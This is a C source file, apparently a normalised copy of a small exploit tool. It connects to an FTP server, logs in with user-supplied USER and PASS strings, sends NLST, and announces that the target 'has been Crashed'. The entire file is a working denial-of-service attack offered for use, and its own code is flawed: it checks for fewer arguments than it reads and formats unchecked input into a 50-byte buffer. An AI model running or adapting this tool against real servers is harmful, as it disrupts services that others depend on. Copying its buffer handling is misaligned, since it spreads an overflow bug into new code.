
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {int sin_port; TYPE_1__ sin_addr; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int sockaddr_mysocket ;
typedef int answer ;


 int AF_INET ;
 int SOCK_STREAM ;
 int atoi (char*) ;
 int connect (int,struct sockaddr*,int) ;
 int fprintf (int ,char*,...) ;
 int htons (int) ;
 int inet_addr (char*) ;
 int memset (char*,int ,int) ;
 int recv (int,char*,int,int ) ;
 int send (int,char*,int ,int ) ;
 int shutdown (int,int) ;
 int socket (int ,int ,int ) ;
 int sprintf (char*,char*,...) ;
 int stderr ;
 int stdout ;
 int strlen (char*) ;
 int syntax (char*) ;

int main(int argc, char **argv)
{
 if (argc < 4)
  syntax(argv[0]);

 int port = atoi(argv[2]);

 int mysocket;
 int mysocket2;
 int srv_connect;
 int sockaddr_long;


  struct sockaddr_in sockaddr_mysocket;
  sockaddr_long = sizeof(sockaddr_mysocket);
  sockaddr_mysocket.sin_family = AF_INET;
  sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);
  sockaddr_mysocket.sin_port = htons(port);

        char request[50];
 char answer[200];

        fprintf(stdout,"[+]Connect to Server %s\n",argv[1]);

                mysocket2 = socket(AF_INET, SOCK_STREAM, 0);
                        if(mysocket2 == -1){
                        fprintf(stderr,"[-]FAILED SOCKET\n");
   return 1;}

 srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long);

 if (srv_connect != -1)
   {

                memset(answer,0,200);
         recv(mysocket2,answer,sizeof(answer),0);

  sprintf(request, "USER %s\r\n", argv[3]);
   if (send(mysocket2,request,strlen(request),0) == -1){
    fprintf(stderr,"[-]Send Request USER\t\t[FAILED]\n");
    shutdown(mysocket2,1);
    return 1;}
   else{
    memset(answer,0,200);
    recv(mysocket2,answer,sizeof(answer),0);
    }

  sprintf(request, "PASS %s\r\n", argv[4]);
                  if (send(mysocket2,request,strlen(request),0) == -1){
                          fprintf(stderr,"[-]Send Request PASS\t\t[FAILED]\n");
                          shutdown(mysocket2,1);
                          return 1;}
                  else{
     memset(answer,0,200);
                          recv(mysocket2,answer,sizeof(answer),0);
                   }
                sprintf(request, "NLST\r\n");
                        if (send(mysocket2,request,strlen(request),0) == -1){
                                fprintf(stderr,"[-]Send Request NLST\t\t[FAILED]\n");
                                shutdown(mysocket2,1);
                                return 1;}

  }
 else{
  fprintf(stderr,"[-]Connect\t\t[FAILED]\n");
  shutdown(mysocket2,1);
  return 1;}


 shutdown(mysocket2,1);


fprintf(stdout,"[+]Done! %s has been Crashed\n", argv[1]);
return 0;
}
